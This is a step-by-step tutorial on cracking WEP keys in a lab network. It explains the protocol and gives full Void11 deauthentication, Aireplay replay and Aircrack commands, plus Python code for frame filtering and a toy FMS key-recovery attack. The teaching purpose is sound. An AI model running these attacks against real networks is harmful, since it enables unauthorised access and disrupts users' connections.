Ever since WLAN technology appeared, "security" has been the shadow that follows the word "wireless", and attacks on the authentication and encryption protocols used by wireless networks have followed close behind. There are hundreds, perhaps thousands, of articles on the Internet about attacking and cracking WEP, but how many people can actually break WEP's encryption? Below I first explain how WEP encryption works, and then give a step-by-step method by which even a beginner can recover a WEP key. The ultimate goal, of course, is to let readers configure their own networks to better resist such attacks.
I. WEP: the initial protector of Wireless Network Security
Compared with a wired network, data sent and received over a wireless LAN is far easier to eavesdrop on. A complete wireless LAN design therefore needs two essential security elements: encryption and authentication. Their fundamental purpose is to bring wireless traffic to the same security level as wired traffic. To that end the 802.11 standard adopted the WEP (Wired Equivalent Privacy) protocol, a security mechanism for encrypting traffic and authenticating nodes, used mainly to protect the confidentiality of link-layer data in a wireless LAN. WEP is a symmetric scheme: encryption and decryption use the same key and the same algorithm. It uses an encryption key (the WEP Key) to encrypt the data portion of every packet exchanged on the 802.11 network. Once encryption is enabled, two 802.11 devices must both be configured for encryption and must share the same key. If one device is configured to use encryption and the other is not, communication fails even if both hold the same key (Figure 1).
Figure 1: WEP Encryption
WEP encryption process
WEP supports 64-bit and 128-bit keys. A 64-bit key is entered as 10 hexadecimal characters (0-9 and A-F) or 5 ASCII characters; a 128-bit key as 26 hexadecimal or 13 ASCII characters. 64-bit encryption is sometimes called 40-bit and 128-bit encryption is sometimes called 104-bit, because 24 bits of each are the initialization vector (IV), which is transmitted in the clear and is not part of the secret key. 152-bit WEP is not standard and is not widely supported by client devices. WEP relies on the key shared by both parties to protect the data. The encryption process is as follows.
1. Checksumming.
(1) Compute an integrity check value (the ICV, a CRC-32 checksum) over the input data.
(2) Append the checksum to the input data; the combined data is the plaintext that serves as the input to the encryption step.
2. Encryption. The plaintext from step 1 is encrypted with a stream cipher. This serves two purposes: keeping the data confidential, and, through the checksum, letting the receiver detect modification of the data. (In practice the second protection is weak: CRC-32 is linear, so an attacker can flip bits in the ciphertext and fix up the checksum without knowing the key.)
(1) Concatenate the 24-bit initialization vector (IV) with the 40-bit key to form a 64-bit seed.
(2) Feed the 64-bit seed to the pseudo-random number generator (RC4), which produces a key stream as long as the plaintext.
(3) XOR the plaintext with the key stream bit by bit; the result is the ciphertext.
3. Transmission. Concatenate the IV (in the clear) with the ciphertext to form the encrypted data frame, and transmit it on the wireless link (Figure 2).
Figure 2: WEP encryption process
WEP decryption process
Decryption of a received frame is simply the inverse of the encryption process:
1. Recover the plaintext. The receiver takes the IV from the frame, regenerates the same key stream from IV and shared key, and XORs it with the received ciphertext to recover the plaintext.
2. Check the checksum. The receiver splits the recovered plaintext into data and checksum, recomputes the checksum over the data, and compares it with the received one. Only frames whose checksum matches are accepted.
Figure 3: WEP decryption process
II. Preparations before cracking the WEP Key
In the next two sections I will walk through cracking a WEP key step by step. The method needs no special hardware: two laptops with wireless NICs (it can even be done with one), and the whole attack uses only freely available software, no professional tools. You do not need to be a network expert to follow along, but you should know basic network terms and principles: at least how to ping another machine to check connectivity, how to open a Windows command prompt and enter commands, and your way around the Windows network properties windows. That is the whole prerequisite; otherwise it would hardly be a method a beginner can follow.
1. Create an experiment environment
Before we begin, the first step is to build a lab environment. Do not practice on someone else's network: that is illegal as well as unethical. To build the wireless platform you need a wireless AP and three laptops with wireless NICs (desktops with wireless NICs also work); that simple network is enough. Figure 4 shows the topology.
Figure 4: Create an experiment environment
In the network in Figure 4 the wireless AP is a NETGEAR WGT624v2. It is the target of the attack and is called the target AP below. Of the three machines, one is the client that is the target of the attack, called "Target". One laptop performs active attacks to generate network traffic, so that many packets can be captured in a short time; it is called "Attack". The remaining laptop sniffs and captures the packets generated by the active attacks; it is called "Sniff". The whole process can be completed on a single laptop, but I do not recommend it: using one laptop makes the later work much more troublesome, and capturing while injecting from the same card causes problems. On a lightly used WLAN, active attacks beat passive listening: they generate far more packets in a short period of time, which speeds up cracking the WEP key considerably.
Laptops are not mandatory for this lab; desktop PCs, or a mix of desktops and laptops, also work. Laptops are simply more portable and have better compatibility with current wireless PC Cards.
The wireless card in Target can use any chipset; any manufacturer's 802.11b product will do. The Attack and Sniff machines use two 802.11b cards based on the PRISM chipset. Many of the tools used later (such as Kismet) support a wide range of wireless adapters, but a PRISM 2 based card is recommended because every tool needed during the cracking process supports it.
Wireless NICs come with either an external or a built-in antenna. If the card you buy has no built-in antenna you must buy one separately. The advantage of an external antenna is higher gain and better sensitivity, and you can point it to receive a better signal; a built-in antenna is more convenient to carry but cannot be aimed. I have used a portable external antenna that is very convenient: small rubber suction cups on its base let it stick to the top of a laptop, and in a car it holds firmly to a window. See the antenna figure below.
Figure 4: Mobile Antenna
2. Experiment WLAN settings
Setting up this lab correctly matters, because we want every operation confined to the lab. The attack described below forcibly disconnects clients from an AP, and that can seriously disrupt wireless users in the vicinity; you must protect users who are not part of the lab WLAN. If you are in a crowded office, an office building or another area covered by many wireless networks, run the experiment at night when nobody is working and the networks are idle, to avoid collateral damage to bystanders.
The first step is to connect and configure the lab WLAN that will be attacked. As described above, it consists of an access point (wireless router) and a single wireless client, and it is protected by the WEP key we want to crack. Set the SSID (Service Set Identifier) of the target AP to "starbucks". The SSID, also called the network name, distinguishes networks from one another. A wireless station must present the same SSID as the access point to join it; if the SSIDs differ, the AP refuses the association. The SSID can be thought of as a simple password that provides a minimal access-control mechanism. Then configure a 64-bit WEP key on this AP.
Record the following information for future use.
① The MAC address of the AP. It is usually displayed in the AP's web configuration menu, and may also be printed on a label on the bottom or side of the AP.
② The SSID of the AP.
③ The wireless channel of the AP.
④ The WEP key. If the AP shows the key in a form like 0xFFFFFFFFFF (where each F stands for one hex digit of the key you set), write down every character except the leading 0x.
The second step is to connect the Target client to the target AP so that we can configure it further (everything below is on Windows XP). Right-click the "My Network Places" icon on the desktop (or click Start, then Properties), double-click "Wireless Network Connection", and the window in Figure 5 opens. Several available wireless networks may be listed; if there is only one wireless network in range, only the newly configured AP named "starbucks" appears. Double-click that SSID to connect to the target AP.
Figure 5: connect to the target WLAN
Because WEP is enabled on the AP, Windows prompts for a key during connection (Figure 6). Enter the WEP key you just set (paste it from a Notepad or WordPad document). After a moment Windows reports that it is connected to the network. Verify the connection by pinging a computer on the wired network, or, if the lab WLAN is connected to the Internet, by opening a web site. If you cannot ping a machine with a known address or cannot open a web site, open the properties of the wireless adapter, click "Support", and check whether the wireless interface has obtained a correct IP address. If not, check that the DHCP server on the network is enabled and that the adapter's TCP/IP properties are set to "Obtain an IP address automatically". If everything looks normal, click "Repair" in the wireless connection window to reset it.
Figure 6: Enter the WEP Key
Step 3: record the MAC address of the Target machine. Once Target is connected to the network, record its MAC address. There are two ways. One is to open a command prompt window and enter the ipconfig /all command; the MAC address of the wireless adapter is the highlighted value in Figure 7.
Figure 7: Enter the ipconfig /all command to find the MAC address
On Windows XP you can also get the MAC address from the "Wireless Network Connection Status" window: click "Support", then "Details", and the MAC address is shown on the right side of the window (Figure 8). Different machines may label it differently, for example as "Physical Address". In this window the bytes of the MAC address are separated by dashes; the dashes are only for readability and are not part of the actual address.
Figure 8: MAC address displayed in network connection details
3. Laptop settings
First we need the tools used to crack the WEP key: Kismet, Airodump, Void11, Aireplay and Aircrack. Kismet scans the WLANs in the area, finds the lab WLAN and collects its data (SSID, channel, and the MAC addresses of the AP and of the clients connected to it). Airodump listens on the target WLAN and captures the packets it generates to a file. Void11 deauthenticates a client from the target AP, forcing it to reconnect and therefore to send ARP requests. Aireplay captures those ARP requests and replays them to the target AP as if they came from a valid client. Aircrack takes the capture file produced by Airodump and extracts the WEP key from it.
All of them are free, open-source software, and all are found on the "Auditor Security Collection" live CD. This is a bootable disc containing a modified Kanotix Linux that needs no hard disk: it loads into memory at boot and automatically detects and configures many wireless NICs. The version used in this article is the then-latest auditor-150405-04. Burn it to CD with any CD burning software, one copy each for the Attack and Sniff machines.
Insert the wireless card into the laptop (a built-in wireless card is even better), set the laptop to boot from CD, and put the Auditor Security Collection CD into the drive. After you select a screen resolution from the Auditor boot menu, Kanotix Linux loads into memory and runs, and the Auditor start screen appears (Figure 9).
Figure 9: Start Screen of Auditor
On the Auditor desktop the two most important icons are Programs and Command Line, in the lower-left corner of the screen; most of what follows is done through them (Figure 10).
Figure 10: Position of Program and Command Line
Before anything else, make sure Auditor has recognized the wireless adapter. Click the Command Line icon to open a terminal window and enter the iwconfig command. In the output you should see an interface named "wlan0"; that is the name Auditor assigns to a PRISM-based card. If the Attack laptop shows output like Figure 11, Auditor has detected the wireless card and you can move on. Repeat the same check on the other laptop.
Figure 11: Use the iwconfig command to check the wireless network card
III. The actual cracking process
1. Use Kismet for network detection
Kismet is a Linux wireless network scanner and a convenient tool for locating the target WLAN by listening to the wireless signals around it. Kismet can also capture network traffic, but there are better tools for that (such as Airodump), so here we only use it to confirm that the wireless adapter works and to scan for networks; the following sections use other tools to actually listen to and capture the network traffic.
Click the Programs icon, then Auditor, then Wireless, then Scanner/Analyzer, and finally Kismet to run Kismet (Figure 12).
Figure 12: Run Kismet
Besides scanning, Kismet can save captured packets to files for later analysis, so it asks where to store them: to save them under root/desktop, click "Desktop" and then "OK", as shown in Figure 13. Kismet then asks for the prefix of the capture file name; we can change the default, for example to "capture", and click OK. Kismet will then name each capture file "capture" followed by a sequence number.
Figure 13: Specify the file storage location in Kismet
When Kismet starts it lists every wireless LAN it finds in the area. The "Name" column shows the SSID of each AP, and the target WLAN should be among them (the row whose Name is starbucks). In that row the CH column (the channel used by the AP) should match the channel you wrote down earlier. The right-hand side of the window shows the number of WLANs found, the packets captured, the number of encrypted packets and so on (Figure 14). If Kismet finds many neighbouring access points, move the lab farther away from them or disconnect any high-gain antenna attached to your card.
Kismet detects packets from the target AP even when the Target computer is switched off, because the AP keeps sending "beacons" that announce its presence to any computer with a wireless card in range. In effect the AP is saying "My name is XXXXX, please connect to me."
Figure 14: content displayed by Kismet
By default Kismet runs in autofit mode and the list is unordered. To sort the APs in a meaningful order press "s" to open the "Sort" menu, then press a letter to choose the sort key: "f" sorts by the first letter of the AP name, "c" by the channel the AP uses, "l" by time, and so on.
Now let us look at the details of the target AP. Press "s" and then "c" to sort the list by channel, move the highlight to the SSID of the target AP and press Enter; a window showing the details of the selected AP (SSID, MAC address, channel) opens, as in Figure 15. Most of the basic information needed to crack the WEP key of an encrypted WLAN is here. Some WLAN setups hide the SSID or disable SSID broadcast, which defeats scanning with NetStumbler, but Kismet is not fooled: it easily detects hidden SSIDs. Kismet captures more network information than NetStumbler and discovers an AP's SSID by following the exchanges between the AP and the clients connected to it.
Figure 15: Kismet displays details of an AP
The last piece of information we need is the MAC address of the wireless client connected to the target AP, which Kismet also makes easy. Return to Kismet and press "q" to close the details window; the target AP you just viewed remains selected. Press "Shift + C" to open a list of the clients associated with the target AP, with their MAC addresses shown on the left of the window (Figure 16). This window shows the MAC address of the AP as well as of the clients connected to it. Do you remember the AP's MAC address you recorded at the beginning? The address that is not the AP's is the client's.
Figure 16: Use Kismet to find the MAC address of the client
If you do not see the Target computer's MAC address, check that it is switched on and connected to the target AP (start the Target computer, connect to the target AP and open a web page); after about 10-30 seconds its MAC address should appear in Kismet. It is also good practice to write down the MAC addresses of all clients, so that you are not blocked when a particular client does not show up during the cracking process.
2. capture data packets with airodump
Now we know the basic information needed for cracking, and it is time to use Airodump. Airodump's job is to capture packets and write them to a file that Aircrack can read. On either of the two machines used for the attack (I use the Attack machine), open a shell window and enter the following commands:
iwconfig wlan0 mode monitor
iwconfig wlan0 channel THECHANNELNUM
cd /ramdisk
airodump wlan0 cap
Note: replace THECHANNELNUM with the channel number of the WLAN to be cracked. The /ramdisk directory is where the capture files are stored. If there is another AP near the lab WLAN, you can add the MAC address of the target AP to the end of the airodump command as a parameter, for example airodump wlan0 cap1 MACADDRESSOFAP (Figure 17).
Figure 17: Airodump Command Format
With that parameter, airodump writes only packets from the target AP to the capture file (cap1). Press Ctrl+C to exit Airodump, enter ls -l to list the directory, and check the size of the file with the .cap extension. After capturing for a few seconds, if packets were captured successfully the file will be a few KB. If Airodump is stopped and started again with the same parameters, the new file gets the next sequence number: if the first was cap1, the second is cap2.
While Airodump is running, the BSSID value on the left of the window is the MAC address of the target AP. In the Airodump window the Packet and IV counters keep increasing, because Windows generates background network traffic even when the Target client is not opening web pages or sending and receiving e-mail. After a while, though, the IV count only rises occasionally. If you browse web pages on the Target computer, the IV count in Airodump climbs as each new page opens (Figure 18).
Figure 18: IV value displayed by Airodump
We are not interested in the Packet count, because it does not help crack WEP. The IV count is the number that matters: to crack a 64-bit WEP key you need about 50,000 to 200,000 IVs, and a 128-bit key needs about 200,000 to 700,000 IVs.
You may notice that the IV count does not grow quickly under normal traffic. In fact, under normal conditions capturing enough packets from most WLANs to crack the WEP key may take hours or even days. Fortunately there are several ways to speed this up. The most effective is to increase the traffic on the target WLAN so that packets are generated faster. You can simulate this by continuously pinging a computer or downloading a large file on the Target computer: with Airodump running on the Attack computer you will see the IV count rise slowly. Using BitTorrent to download a large file (such as a Linux distribution ISO or a movie) makes the IV count rise much faster.
Another method is to run a continuous ping from a Windows command prompt window:
ping -t -l 50000 ADDRESS_OF_ANOTHER_LAN_CLIENT
Here ADDRESS_OF_ANOTHER_LAN_CLIENT is the IP address of the target AP, the router, or any other host on the LAN that answers pings.
3. Use Void11 to generate more communication traffic
Void11 forcibly deauthenticates a wireless client from the AP it is associated with, that is, it disconnects the client. Once disconnected from the WLAN, the wireless client automatically tries to reconnect to the AP, and the reconnection generates traffic. This is commonly called a de-authentication or deauth attack.
Start the Sniff computer and insert the Auditor CD into its drive. After Auditor starts, open a shell window and enter the following commands:
switch-to-hostap
cardctl eject
cardctl insert
iwconfig wlan0 channel THECHANNELNUM
iwpriv wlan0 hostapd 1
iwconfig wlan0 mode master
void11_penetration -D -s MACOFSTATION -B MACOFAP wlan0
Note: replace THECHANNELNUM with the channel number of the target WLAN, and MACOFSTATION and MACOFAP with the MAC addresses of the client and of the AP of the target WLAN, for example void11_penetration -D -s 00:90:4b:C0:C4:7f -B 00:C0:49:BF:14:29 wlan0. When void11 is run from the Auditor Security Collection CD it may print an "invalid argument" error; this does not matter and can be ignored.
While void11 runs on the Sniff computer, watch what happens on the Target computer. A user at that machine will find the network suddenly becomes very slow, then seems to stall, and after a few seconds the network connection is lost entirely. If you watch the Windows XP wireless client utility, everything is normal before the void11 attack starts and Windows shows the AP as connected; once void11 starts, the status changes from connected to disconnected (Figure 19). If void11 is stopped on the Sniff computer, the Target computer reconnects to the target AP within a few seconds.
Figure 19: the target computer is disconnected
Back on the Attack computer, which has been running airodump all along, the IV count rises by about 100-200 within a few seconds after void11 starts, because of the traffic generated when the Target client tries to reconnect to the target AP.
4. Packet replay with Aireplay
Forcing traffic with a deauth attack alone usually does not produce enough IVs, and deauthentication is disruptive to normal WLAN operation. To generate more traffic we use a different technique, a replay attack: capture a valid packet sent by the target client, then re-inject it to the AP over and over, far more often than the client would send it in normal use. Because the traffic appears to come from a valid client on the network it does not interfere with normal operation, and it quietly produces a steady stream of new IVs behind the scenes.
The plan is to capture a packet produced by void11's deauth attack, stop the deauth attack, and then start a replay attack with the captured packet. The best packet to capture is an ARP request, because it is small (68 bytes) and has a fixed, easily recognized format. The roles of Attack and Sniff now change. Attack runs only aireplay, which generates traffic (and thus IVs) on the network to shorten the time needed to crack the WEP key. Sniff no longer runs the deauth attack (Void11) but captures the traffic (with Airodump), and finally Aircrack is run on the captured data.
Start Aireplay first: open a shell window on the Attack computer and enter the following commands (Figure 20):
switch-to-wlanng
cardctl eject
cardctl insert
monitor.wlan wlan0 THECHANNELNUM
cd /ramdisk
aireplay -i wlan0 -b MACADDRESSOFAP -m 68 -n 68 -d ff:ff:ff:ff:ff:ff
Note: switch-to-wlanng and monitor.wlan are scripts on the Auditor CD that simplify the setup and reduce typing. Replace THECHANNELNUM with the channel number of the target WLAN; -b gives the MAC address of the target AP, -m and -n set the minimum and maximum packet length to 68 bytes, and -d restricts the destination to the broadcast address ff:ff:ff:ff:ff:ff. At first nothing exciting happens: Aireplay reports that it has captured packets of various kinds, but they are generally not what we need (a 68-byte packet whose destination MAC address is ff:ff:ff:ff:ff:ff).
Figure 20: Start Aireplay
Now go to the Target computer, open its wireless utility and watch its connection status, and start a void11 deauth attack on the Sniff computer. Once void11 starts you will see the Target computer lose its connection to the target AP, and the packet rate shown by Aireplay increase.
When Aireplay captures a candidate packet it asks whether it is the one you want. In this attack the packet we need has the following features:
FromDS: 0
ToDS: 1
BSSID: MAC address of the target AP
Source MAC: MAC address of the Target computer
Destination MAC: ff:ff:ff:ff:ff:ff (broadcast)
If the packet does not match these conditions, answer n (no) and Aireplay keeps capturing. Once Aireplay finds a packet that matches, answer y (yes); Aireplay switches from capture to replay mode and starts the replay attack. Immediately go back to the Sniff computer and stop void11's deauth attack (Figure 21).
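As an added example (my own illustration, not code from the original article or from the Aireplay project), here is a small Python filter that applies the packet features listed above to raw 802.11 frames, which is the same test you perform by hand when Aireplay asks whether a captured packet matches. The frames are constructed sample data; the AP and station MAC addresses are the example values from the void11 command earlier, and ARP_REQUEST_LEN assumes that the 68-byte length counts the header, IV, LLC/SNAP header, ARP body and ICV but not the FCS.

```python
# Added example (not part of the original article): replay-candidate filter
# for 802.11 data frames, mirroring the criteria Aireplay prompts for.
import struct

BROADCAST = b"\xff" * 6
TARGET_AP = bytes.fromhex("00c049bf1429")       # MACOFAP from the void11 example
TARGET_STATION = bytes.fromhex("00904bc0c47f")  # MACOFSTATION from the void11 example
ARP_REQUEST_LEN = 68   # 24 header + 4 IV + 8 LLC/SNAP + 28 ARP + 4 ICV (FCS not counted)

def parse_80211(frame):
    """Decode the 802.11 MAC header fields a replay filter needs.

    Frame Control is a little-endian 16-bit field: bits 2-3 type (2 = data),
    bit 8 ToDS, bit 9 FromDS, bit 14 Protected (WEP). Which of the three
    addresses is the BSSID, source and destination depends on ToDS/FromDS.
    """
    fc, _duration, a1, a2, a3, _seq = struct.unpack("<HH6s6s6sH", frame[:24])
    to_ds, from_ds = (fc >> 8) & 1, (fc >> 9) & 1
    if to_ds and not from_ds:        # station -> AP: Addr1=BSSID, Addr2=SA, Addr3=DA
        bssid, sa, da = a1, a2, a3
    elif from_ds and not to_ds:      # AP -> station: Addr1=DA, Addr2=BSSID, Addr3=SA
        da, bssid, sa = a1, a2, a3
    elif not to_ds and not from_ds:  # ad hoc: Addr1=DA, Addr2=SA, Addr3=BSSID
        da, sa, bssid = a1, a2, a3
    else:                            # WDS frames carry a 4th address; not handled here
        bssid = sa = da = None
    return {
        "type": (fc >> 2) & 3,
        "protected": (fc >> 14) & 1,
        "to_ds": to_ds, "from_ds": from_ds,
        "bssid": bssid, "sa": sa, "da": da,
        "length": len(frame),
    }

def is_replayable_arp(frame, ap=TARGET_AP, station=TARGET_STATION):
    """True for a WEP data frame matching the Aireplay criteria in the text:
    FromDS=0, ToDS=1, BSSID=AP, source=target client, destination=broadcast,
    and 68 bytes long (the size of an encrypted ARP request)."""
    h = parse_80211(frame)
    return (h["type"] == 2 and h["protected"] == 1
            and h["to_ds"] == 1 and h["from_ds"] == 0
            and h["bssid"] == ap and h["sa"] == station
            and h["da"] == BROADCAST and h["length"] == ARP_REQUEST_LEN)

def build_frame(to_ds, from_ds, a1, a2, a3, body_len, protected=1):
    """Construct a data frame with the given header bits and a dummy encrypted body."""
    fc = 0x08 | (to_ds << 8) | (from_ds << 9) | (protected << 14)   # type=data, subtype=0
    header = struct.pack("<HH6s6s6sH", fc, 0, a1, a2, a3, 0)
    return header + bytes(body_len)      # IV + ciphertext + ICV stand-in (constructed)

GATEWAY = bytes.fromhex("000c29aabbcc")        # constructed address of another LAN host
OTHER_STATION = bytes.fromhex("0011223344ff")  # constructed address of another client

# Constructed capture: only the first frame is an ARP request worth replaying.
SAMPLE_CAPTURE = [
    build_frame(1, 0, TARGET_AP, TARGET_STATION, BROADCAST, 44),   # ARP request, 68 bytes
    build_frame(0, 1, TARGET_STATION, TARGET_AP, GATEWAY, 44),     # AP -> station frame
    build_frame(1, 0, TARGET_AP, TARGET_STATION, GATEWAY, 44),     # unicast, not broadcast
    build_frame(1, 0, TARGET_AP, TARGET_STATION, BROADCAST, 120),  # broadcast but too long
    build_frame(1, 0, TARGET_AP, OTHER_STATION, BROADCAST, 44),    # another client's ARP
]

def select_replay_candidates(frames, ap=TARGET_AP, station=TARGET_STATION):
    """Indexes of frames that pass the filter, i.e. the ones you would answer 'y' to."""
    return [i for i, f in enumerate(frames) if is_replayable_arp(f, ap, station)]

if __name__ == "__main__":
    for i, f in enumerate(SAMPLE_CAPTURE):
        h = parse_80211(f)
        print(i, "ToDS", h["to_ds"], "FromDS", h["from_ds"], "len", h["length"],
              "replay" if is_replayable_arp(f) else "skip")
```

The length check is what makes the filter useful: without it, any broadcast frame from the client (a DHCP discover, a NetBIOS announcement) would pass, and replaying a frame that is not an ARP request does not reliably provoke the AP into generating fresh encrypted traffic.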
Figure 21: matching packet captured by Aireplay
If Aireplay does not find the right packet among thousands captured, Void11 may be the problem: it can interfere with the target AP and its clients so much that they never get a chance to complete the reconnection. Stop void11 manually (Ctrl+C), restart it, and add the -d parameter (a delay value in microseconds) to the void11 command line, trying different values to give the AP and client time to reconnect.
If the Target client is idle it may be hard to capture an ARP request through the deauth attack. This rarely happens on a real WLAN, but in this lab environment it can be a problem. If Aireplay does not capture the expected packet, run a continuous ping or a download on the Target client before starting the deauth attack. If Void11 does not work at all, leave aireplay running on the Attack computer, stop void11 on the Sniff computer, and on the Target computer disconnect from the wireless network and reconnect; within thirty seconds, as it rejoins the WLAN and requests an IP address, Aireplay on the Attack computer will see the ARP request sent by the Target computer.
5. The final cracking time
After the replay attack on the Attack computer has run for a while it will have generated enough IVs, and now comes the final step of actually cracking WEP. With void11 stopped on the Sniff computer, enter the following commands there to make Airodump capture packets:
switch-to-wlanng
cardctl eject
cardctl insert
monitor.wlan wlan0 THECHANNELNUM
cd /ramdisk
airodump wlan0 cap1
Replace THECHANNELNUM with the channel number of the target WLAN. If there are several APs in the area, add the MAC address of the target AP to the end of the airodump command as a parameter, for example airodump wlan0 cap1 MACADDRESSOFAP. While Airodump writes IVs to the file we can run Aircrack at the same time to search the file for the WEP key. Leave Airodump running, open another shell window and enter the following commands to start Aircrack:
cd /ramdisk
aircrack -f FUDGEFACTOR -m MACADDRESSOFAP -n WEPKEYLENGTH -q 3 cap*.cap
Note: FUDGEFACTOR is an integer (default 2), MACADDRESSOFAP is the MAC address of the target AP, and WEPKEYLENGTH is the length of the WEP key you are trying to crack (64, 128, etc.), as shown in Figure 22.
Figure 22: Aircrack Command Format
Aircrack reads the IVs from the capture files and uses them to recover the WEP key. The fudge factor (-f) controls how many candidate values Aircrack tries for each key byte beyond the most likely one: the default of 2 is fast, while a larger value is slower but more likely to find the key when the capture is small or noisy. If you are lucky, you will see the WEP key found, as in Figure 23.
Figure 23: successfully cracked the WEP Key
With the replay attack, airodump capture, aircrack and aireplay all running at the same time, cracking a 64-bit WEP key took about five minutes. There is a good deal of luck involved: sometimes a 64-bit key needs around 25,000 IVs to be collected, and it takes longer. You must tell Aircrack the length of the key you are trying to recover; no tool can give you this. You certainly know it for the WLAN in your own lab, but on an unfamiliar network you have to try both 64 and 128.
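The following added example (my own illustration, not code from the original article or from Aircrack) models both the WEP encryption and decryption process described in section I and the key recovery this section describes. It builds WEP frames with a CRC-32 ICV and an RC4 key stream seeded with IV || key, shows why a repeated IV is dangerous, and then runs a toy FMS-style statistical attack over constructed frames with weak IVs, searching the best-voted candidates for each key byte the way Aircrack's fudge factor does. KEY_40, the IVs and the ARP payload are constructed; the only known plaintext the attack uses is the 0xAA DSAP byte that begins every LLC/SNAP frame. Real captures contain a far smaller share of weak IVs, which is why Aircrack needs the IV counts quoted above.

```python
# Added example (not part of the original article): a minimal WEP model
# (CRC-32 ICV, RC4 seeded with IV || key, IV sent in the clear) plus a toy
# FMS key recovery of the kind Aircrack runs over captured IVs.
import zlib
from collections import Counter

KEY_40 = bytes.fromhex("1f2e3d4c5b")   # constructed 64-bit (40-bit secret) WEP key
SNAP_FIRST_BYTE = 0xAA                 # first plaintext byte of every WEP data frame

def rc4_ksa(key):
    """RC4 key scheduling: returns the initial permutation S."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    return s

def rc4_stream(key, n):
    """First n key-stream bytes for an RC4 key (here IV || secret key)."""
    s, i, j, out = rc4_ksa(key), 0, 0, bytearray()
    for _ in range(n):
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) % 256])
    return bytes(out)

def wep_encrypt(iv, key, data):
    """Step 1 append the ICV, step 2 XOR with RC4(IV||key), step 3 prepend the IV."""
    plaintext = data + zlib.crc32(data).to_bytes(4, "little")
    stream = rc4_stream(iv + key, len(plaintext))
    return iv + bytes(p ^ k for p, k in zip(plaintext, stream))

def wep_decrypt(frame, key):
    """Regenerate the stream from the frame's IV, XOR, verify the ICV (None on failure)."""
    iv, body = frame[:3], frame[3:]
    plaintext = bytes(c ^ k for c, k in zip(body, rc4_stream(iv + key, len(body))))
    data, icv = plaintext[:-4], plaintext[-4:]
    return data if zlib.crc32(data).to_bytes(4, "little") == icv else None

def xor_of_plaintexts(frame_a, frame_b):
    """Two frames under the same IV share a key stream, so XORing their
    ciphertexts cancels it and leaks the XOR of the two plaintexts."""
    assert frame_a[:3] == frame_b[:3], "IVs differ"
    return bytes(x ^ y for x, y in zip(frame_a[3:], frame_b[3:]))

def fms_votes(frames, known):
    """FMS voting for secret key byte number len(known), given the bytes
    already recovered. Replays the part of the KSA we can compute (IV plus
    known bytes), keeps frames whose state is 'resolved', and derives a
    candidate from the first key-stream byte; roughly 5% of weak-IV frames
    vote for the right value, the rest spread their votes evenly."""
    n = 3 + len(known)                     # index of the RC4 key byte under attack
    votes = Counter()
    for frame in frames:
        key_prefix = list(frame[:3]) + list(known)
        z = frame[3] ^ SNAP_FIRST_BYTE     # first key-stream byte via known plaintext
        s, j = list(range(256)), 0
        for i in range(n):
            j = (j + s[i] + key_prefix[i]) % 256
            s[i], s[j] = s[j], s[i]
        a = s[1]
        if a < n and (a + s[a]) % 256 == n:            # resolved: z == S[n] after step n
            votes[(s.index(z) - j - s[n]) % 256] += 1  # so j_n = S^-1[z]; solve for K[n]
    return votes

def recover_key(frames, key_len=5, fudge=5, known=()):
    """Depth-first search over the `fudge` best-voted candidates per byte;
    a full key is accepted only if it decrypts a frame with a valid ICV.
    This is the trade-off Aircrack's fudge factor (-f) controls."""
    if len(known) == key_len:
        key = bytes(known)
        return key if wep_decrypt(frames[0], key) is not None else None
    for cand, _ in fms_votes(frames, known).most_common(fudge):
        key = recover_key(frames, key_len, fudge, known + (cand,))
        if key is not None:
            return key
    return None

def weak_iv_frames(key, key_len=5):
    """Constructed capture: one encrypted ARP-request-sized frame per FMS
    weak IV of the form (n, 255, x), for n = 3 .. 3 + key_len - 1."""
    arp = bytes([SNAP_FIRST_BYTE, 0xAA, 0x03, 0, 0, 0, 0x08, 0x06]) + bytes(28)
    return [wep_encrypt(bytes([n, 255, x]), key, arp)
            for n in range(3, 3 + key_len) for x in range(256)]

if __name__ == "__main__":
    frames = weak_iv_frames(KEY_40)
    found = recover_key(frames)
    print("captured", len(frames), "frames; recovered",
          found.hex() if found else None, "expected", KEY_40.hex())
```

Two things to take from the model: the IV is the only thing that changes between frames, so every IV that repeats hands the attacker keystream reuse (xor_of_plaintexts), and the attack needs no decryption at all, only the IV and one byte of ciphertext per frame, which is why Airodump's IV counter, not its packet counter, is what matters.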
Better hardware speeds up cracking. A good approach is to copy the capture files to another machine with more memory and a faster processor and do the final cracking there, running only Aircrack on it; aircrack's -p option supports multiple processors, and the new dual-processor machines from AMD and Intel make cracking faster still. This is especially true for longer keys.